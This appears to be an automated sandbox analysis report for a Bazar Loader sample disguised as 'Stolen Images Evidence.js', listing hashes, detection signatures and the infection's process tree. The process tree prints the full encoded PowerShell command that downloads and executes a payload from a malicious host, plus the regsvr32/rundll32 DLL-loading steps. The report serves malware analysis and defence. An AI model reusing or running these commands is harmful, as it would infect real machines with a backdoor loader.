Analysis
max time kernel: 122s
max time network: 124s
platform: windows10_x64
resource: win10-en-20211014
submitted: 14-10-2021 18:11
Static task: static1

Behavioral task: behavioral1
  Sample: Stolen Images Evidence.js
  Resource: win7-en-20210920 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: Stolen Images Evidence.js
  Resource: win10-en-20211014 (windows10_x64)
  0 signatures, 0 seconds
General
Target: Stolen Images Evidence.js
Size: 19KB
MD5: c62b322046bee6a5a86c4fecf5dee72e
SHA1: 18a381be8472fcee623c18cb1bfcf938682bef7d
SHA256: edb86c44b69eb1071a138ec2fd99968a18d671ecbcc6cbd7babcde7a132c1e01
SHA512: 2d19000408a61cbf744defb51fc8f0c64f11c74186cdc2f56317641e16fd7c794919ead08ce119c62ec966dcd5a2c62794845e53f4697e657394c9e90ac1f0dc
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Deobfuscated URLs
    ps1.dropper: http://bobersok.top/333g100/index.php
Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.

Bazar/Team9 Loader payload (2 IoCs)
resource                                                                      yara_rule
behavioral2/memory/2888-141-0x0000000000720000-0x0000000000748000-memory.dmp  BazarLoaderVar6
behavioral2/memory/3472-145-0x00000185898F0000-0x0000018589918000-memory.dmp  BazarLoaderVar6

Blocklisted process makes network request (1 IoC)
flow  pid   Process
13    1432  powershell.exe

Loads dropped DLL (2 IoCs)
pid   Process
2888  regsvr32.exe
3472  rundll32.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid   Process
1432  powershell.exe
1432  powershell.exe
1432  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
description              pid   Process
Token: SeDebugPrivilege  1432  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
description                       pid   Process         procid_target
PID 1816 wrote to memory of 4044  1816  wscript.exe     69
PID 1816 wrote to memory of 4044  1816  wscript.exe     69
PID 4044 wrote to memory of 1432  4044  cmd.exe         71
PID 4044 wrote to memory of 1432  4044  cmd.exe         71
PID 1432 wrote to memory of 2888  1432  powershell.exe  72
PID 1432 wrote to memory of 2888  1432  powershell.exe  72
Processes

C:\Windows\system32\wscript.exe
  Command line: wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
  PID: 1816
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
    PID: 4044
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
      PID: 1432
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\regsvr32.exe
        Command line: "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\ZrQOBam.dat
        PID: 2888
        - Loads dropped DLL

C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\ZrQOBam.dat,DllRegisterServer {0E26A7BA-3829-46D1-83AC-21349F83EC06}
  PID: 3472
  - Loads dropped DLL